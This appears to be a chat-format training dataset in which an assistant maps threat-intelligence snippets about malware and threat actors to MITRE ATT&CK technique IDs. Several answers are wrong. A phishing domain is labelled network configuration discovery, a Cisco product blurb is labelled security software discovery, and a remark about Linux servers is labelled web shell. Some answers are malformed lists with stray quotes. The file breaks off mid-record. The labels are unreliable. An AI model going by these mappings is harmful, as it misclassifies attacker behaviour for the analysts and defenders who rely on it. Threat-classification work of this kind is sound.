{ "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of XTunnel introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "master boot record wiper" }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host)." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Scheduled Task. LockBit 2.0 can be executed via scheduled tasks." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It can download and execute arbitrary code provided from the C&C server, as well as maintain a virtual file system (VFS) inside the registry. The VFS, and any additional files created by the code, are encrypted and stored in a location unique to each victim" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has checked for the existence of specific files including \"/usr/sbin/setenforce\" and \" /etc/selinux/config\". It also has the ability to monitor the cryptocurrency miner file and process." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes payloads using the Windows API call CreateProcessW()." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates then deletes log files during installation of itself as a service." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents" }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1064 - Scripting', 'T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson contains commands to list files and directories, as well as search for files matching certain extensions from a defined list." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST collected information from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader has come signed with revoked certificates." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy can upload and download to/from a victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can collect Microsoft Word documents from the target's file system, as well as \".txt\", \".doc\", and \".xls\" files from the Internet Explorer cache." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred can inject code from files to other running processes." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT33 has used HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access." }, { "role": "assistant", "content": "T1531 - Account Access Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Agent Tesla can add itself to the Registry as a startup program to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects a unique identifier (UID) from a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Perhaps the most interesting part here is the unusual command and control mechanism based on TCP/UDP packets, as well as the C&C hostname which fits previously known Turla activity" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "scans processes on all victim systems in the environment and uses automated scripts to pull back the results." }, { "role": "assistant", "content": "T1064 - Scripting', 'T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has used PowerShell for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon has used several remote administration tools as persistent infiltration channels." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used malware to identify installed software." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has been distributed through malicious links contained within spearphishing emails." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware used by is capable of remotely deleting files from victims." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can collect a list of running processes by calling CreateToolhelp32Snapshot." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINERACK can enumerate active windows." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database ntds.dit." }, { "role": "assistant", "content": "T1003.003 - OS Credential Dumping: NTDS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may collect information about the system by running hostname and systeminfo on a victim." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoxCaon can execute arbitrary commands and utilize the \"ComSpec\" environment variable." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used the command-line interface." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Turla Javascript backdoor added a local_update_check value under the Registry key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT has a command to delete its Registry key and scheduled task." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads and uploads files on the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can find a process owned by a specific user and impersonate the associated token." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One, called \"frown.py,\" is responsible for the communications with the command and control (C2). It uses TLS to encrypt the communication that occurs on port 143. With a successful connection, it will send the word \"almond\" The server should reply either with \"who\" or \"ice. The RAT will answer the \"who\" command with a string that contains the username, computer name and the previously generated UUID. The \"ice\" command simply makes the RAT finish the connection procedure. This is responsible for the interpretation and execution of the C2 commands. The available commands are" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has searched for information on the target company's website." }, { "role": "assistant", "content": "T1594 - Search Victim-Owned Websites" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RawPOS dumps memory from specific processes on a victim system, parses the dumped files, and scrapes them for credit card data." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "appears to have functionality to modify remote Registry information." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nefilim reads the hosts file (C:\\Windows\\System32\\drivers\\etc\\hosts) to get a listing of other systems by IP addresses and hostnames on the network that may be used for Lateral Movement from the current system." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The reconnaissance modules used with can collect information on network configuration." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to use the command shell to execute commands on a compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence can create, delete, or modify a specified Registry key or value." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors compromised web servers to use for C2." }, { "role": "assistant", "content": "T1584.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 8 shows the network communication of the Pause.ps1 download" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection. The domains the group has been using to distribute payloads were usually resolved across a lot of IPs" }, { "role": "assistant", "content": "T1568.001 - Fast Flux DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex has used the \"OutputDebugStringW\" function to avoid malware analysis as part of its anti-debugging technique." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather the victim computer name and serial number." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 added their own devices as allowed IDs for active sync using \"Set-CASMailbox\", allowing it to obtain copies of victim mailboxes. It also added additional permissions (such as Mail.Read and Mail.ReadWrite) to compromised Application or Service Principals." }, { "role": "assistant", "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has the ability to list files upon receiving the \"ls\" command from C2." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 leveraged Sysmon to understand the processes, services in the organization." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "boom! Deletes GID.bin, ShwDoc.VBS and ShwDoc.srv files, as well as the scheduled task whose name a GUID stored in the GID.bin file" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk can stop anti-virus services on a compromised host." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has deleted itself from the system after execution." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It is a preferred platform within data centers and the cloud for businesses, as well as an ongoing favorite when it comes to a majority of Internet-facing web and application servers" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A recent Lokibot campaign has been spotted, which made use of a tunneling service to spread the malware. According to My Online Security, threat actors behind this campaign leveraged a service known as Ngrok. As claimed on the website, Ngrok reveals servers in NATs and Firewalls over secure tunnels. Hence, the service acted as a direct tunnel or a VPN which the actors exploited to push the malware through spam emails" }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has injected a DLL library containing a Trojan into the fwmain32.exe process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used steganography to hide stolen data inside other files stored on Github." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can pull a timestamp from the victim's machine." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has sent malicious Word OLE compound documents to victims." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stealth Falcon malware communicates with its C2 server via HTTPS." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has used TLS-encrypted FTP to exfiltrate data." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D can use HTTP POST and GET requests to send and receive C2 information." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to write random data across a file and delete it." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sent spear phishing emails containing links to .hta files." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuditCred encrypts the configuration." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has used WMI to gather information about the system." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer stores configuration items in alternate data streams (ADSs) if the Registry is not accessible." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": 